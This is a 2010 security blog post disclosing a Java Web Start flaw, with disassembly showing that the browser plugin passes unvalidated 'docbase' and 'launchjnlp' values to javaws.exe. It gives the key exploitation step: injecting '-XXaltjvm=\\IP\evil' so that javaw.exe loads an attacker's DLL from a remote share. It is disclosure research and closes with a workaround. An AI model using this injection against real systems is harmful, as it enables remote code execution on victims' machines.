Reversemode
Home
Tuesday, 02 September 2014
 
 
BYTES & WORDS
[0DAY] JAVA Web Start Arbitrary command-line injection - "-XXaltjvm" arbitrary dll loading PDF Print
Written by Rubén   
Friday, 09 April 2010

Updated Just in case: Tavis' attack also allows remote code execution since the jar is executing without any restriction.

Updated Although Linux contains vulnerable code, I was unable to exploit it in the same manner. It likely can be exploited by using the proper sequence of command-line arguments, but the sudden release didn't allow me to research into this issue.I was focused on Windows at the moment of the disclosure.

Bye bye my little 0day :(, Tavis Ormandy did a great job uncovering a big logic flaw within Java JRE. I discovered that bug and other that affects every browser few weeks ago so I posted the common "0day++" tweet.

The method by which Java Web Start support has been added to the JRE is not less than a deliberately embedded backdoor(I really don't think so) or a flagrant case of extreme negligence (+1).
It's even more incredible that Sun didn't assess the real risk of this flaw after Tavis reported it to them.Acknowledged it, but didn't considered suitable for a OOB patch.
Let's see:

Java Plugin for Browsers (Chrome,Firefox...) - Windows: npjp2.dll (The same for IE8's jp2iexp.dll)

.text:6DAA3D96
.text:6DAA3D96 ; =============== S U B R O U T I N E =======================================
.text:6DAA3D96
.text:6DAA3D96 ; Attributes: bp-based frame
.text:6DAA3D96
.text:6DAA3D96 sub_6DAA3D96    proc near               ; CODE XREF: sub_6DAA2ACB+170p
.text:6DAA3D96
.text:6DAA3D96 Data            = byte ptr -264h
.text:6DAA3D96 var_263         = byte ptr -263h
.text:6DAA3D96 ApplicationName = byte ptr -160h
.text:6DAA3D96 StartupInfo     = _STARTUPINFOA ptr -5Ch
.text:6DAA3D96 ProcessInformation= _PROCESS_INFORMATION ptr -18h
.text:6DAA3D96 cbData          = dword ptr -8
.text:6DAA3D96 hKey            = dword ptr -4
.text:6DAA3D96 arg_0           = dword ptr  8
.text:6DAA3D96 arg_4           = dword ptr  0Ch
.text:6DAA3D96
.text:6DAA3D96                 push    ebp
.text:6DAA3D97                 mov     ebp, esp
.text:6DAA3D99                 sub     esp, 264h
.text:6DAA3D9F                 push    edi
.text:6DAA3DA0                 lea     eax, [ebp+hKey]
.text:6DAA3DA3                 push    eax             ; phkResult
.text:6DAA3DA4                 push    20019h          ; samDesired
.text:6DAA3DA9                 xor     edi, edi
.text:6DAA3DAB                 push    edi             ; ulOptions
.text:6DAA3DAC                 push    offset SubKey   ; "JNLPFile\\Shell\\Open\\Command"
.text:6DAA3DB1                 push    80000000h       ; hKey
.text:6DAA3DB6                 mov     [ebp+cbData], 104h
.text:6DAA3DBD                 call    ds:RegOpenKeyExA
.text:6DAA3DC3                 test    eax, eax
.text:6DAA3DC5                 jz      short loc_6DAA3DCE
.text:6DAA3DC7                 xor     eax, eax
.text:6DAA3DC9                 jmp     loc_6DAA3F16


The default handler is "javaws.exe",continuing...

.text:6DAA3EB7                 push    [ebp+arg_4]
.text:6DAA3EBA                 push    eax
.text:6DAA3EBB                 push    offset aSDocbaseSS ; "\"%s\" -docbase %s %s"
.text:6DAA3EC0                 push    esi             ; LPSTR
.text:6DAA3EC1                 call    ebx ; wsprintfA
.text:6DAA3EC3                 add     esp, 14h
.text:6DAA3EC6                 jmp     short loc_6DAA3ED4
.text:6DAA3EC8 ; ---------------------------------------------------------------------------
.text:6DAA3EC8
.text:6DAA3EC8 loc_6DAA3EC8:                           ; CODE XREF: sub_6DAA3D96+11Fj
.text:6DAA3EC8                 push    eax
.text:6DAA3EC9                 push    offset aSS_0    ; "\"%s\" %s"
.text:6DAA3ECE                 push    esi             ; LPSTR
.text:6DAA3ECF                 call    ebx ; wsprintfA
.text:6DAA3ED1                 add     esp, 10h
.text:6DAA3ED4
.text:6DAA3ED4 loc_6DAA3ED4:                           ; CODE XREF: sub_6DAA3D96+130j
.text:6DAA3ED4                 push    11h
.text:6DAA3ED6                 pop     ecx
.text:6DAA3ED7                 xor     eax, eax
.text:6DAA3ED9                 lea     edi, [ebp+StartupInfo]
.text:6DAA3EDC                 rep stosd
.text:6DAA3EDE                 lea     eax, [ebp+ProcessInformation]
.text:6DAA3EE1                 push    eax             ; lpProcessInformation
.text:6DAA3EE2                 xor     ebx, ebx
.text:6DAA3EE4                 lea     eax, [ebp+StartupInfo]
.text:6DAA3EE7                 push    eax             ; lpStartupInfo
.text:6DAA3EE8                 push    ebx             ; lpCurrentDirectory
.text:6DAA3EE9                 push    ebx             ; lpEnvironment
.text:6DAA3EEA                 push    ebx             ; dwCreationFlags
.text:6DAA3EEB                 push    ebx             ; bInheritHandles
.text:6DAA3EEC                 push    ebx             ; lpThreadAttributes
.text:6DAA3EED                 push    ebx             ; lpProcessAttributes
.text:6DAA3EEE                 push    esi             ; lpCommandLine
.text:6DAA3EEF                 lea     eax, [ebp+ApplicationName]
.text:6DAA3EF5                 push    eax             ; lpApplicationName
.text:6DAA3EF6                 mov     [ebp+StartupInfo.cb], 44h
.text:6DAA3EFD                 call    ds:CreateProcessA


So basically the Java-Plugin Browser is running "javaws.exe" without validating command-line parameters. These parameters can be controlled by attackers via specially crafted embed html tags within a webpage.

Let's see JavaDeploy.txt:

 if (browser == 'MSIE') {

            document.write('<' + 
                'object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" ' +
		'width="0" height="0">' +
		'<' + 'PARAM name="launchjnlp" value="' + jnlp + '"' + '>' +
	        '<' + 'PARAM name="docbase" value="' + jnlpDocbase + '"' + '>' +
                '<' + '/' + 'object' + '>');
        } else if (browser == 'Netscape Family') {

            document.write('<' +
		'embed type="application/x-java-applet;jpi-version=' +
		deployJava.firefoxJavaVersion + '" ' +
                'width="0" height="0" ' +
                'launchjnlp="' +  jnlp + '"' +
                'docbase="' +  jnlpDocbase + '"' +
                ' />');
        }

That's it. This is how JAVA Plugin identifies Java Web Start content (jnlp files).So We can inject command-line parameters through "docbase" tag and even "launchjnlp".

What type of arguments can we abuse to compromise a system?

java.exe and javaw.exe support an undocumented-hidden command-line parameter "-XXaltjvm" and curiosly also "-J-XXaltjvm" (see -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP...



Linux

Same logic error, check this function "_Z10launchJNLPPKcS0" in libnpjp2.so

.text:0000A956                 call    _fork
.text:0000A95B                 test    eax, eax
.text:0000A95D                 jnz     loc_A813
.text:0000A963                 mov     [esp+3048h+var_3048], esi
.text:0000A966                 lea     eax, [ebp+var_3038]
.text:0000A96C                 mov     [esp+3048h+var_3044], eax
.text:0000A970                 call    _execv


MACOSX

Not vulnerable.

Workaround

Disable javaws/javaws.exe in linux and Windows by any mean. Disable Deployment Toolkit to avoid unwanted installation as stated in Tavis' advisory.

Last Updated ( Friday, 09 April 2010 )
< Prev   Next >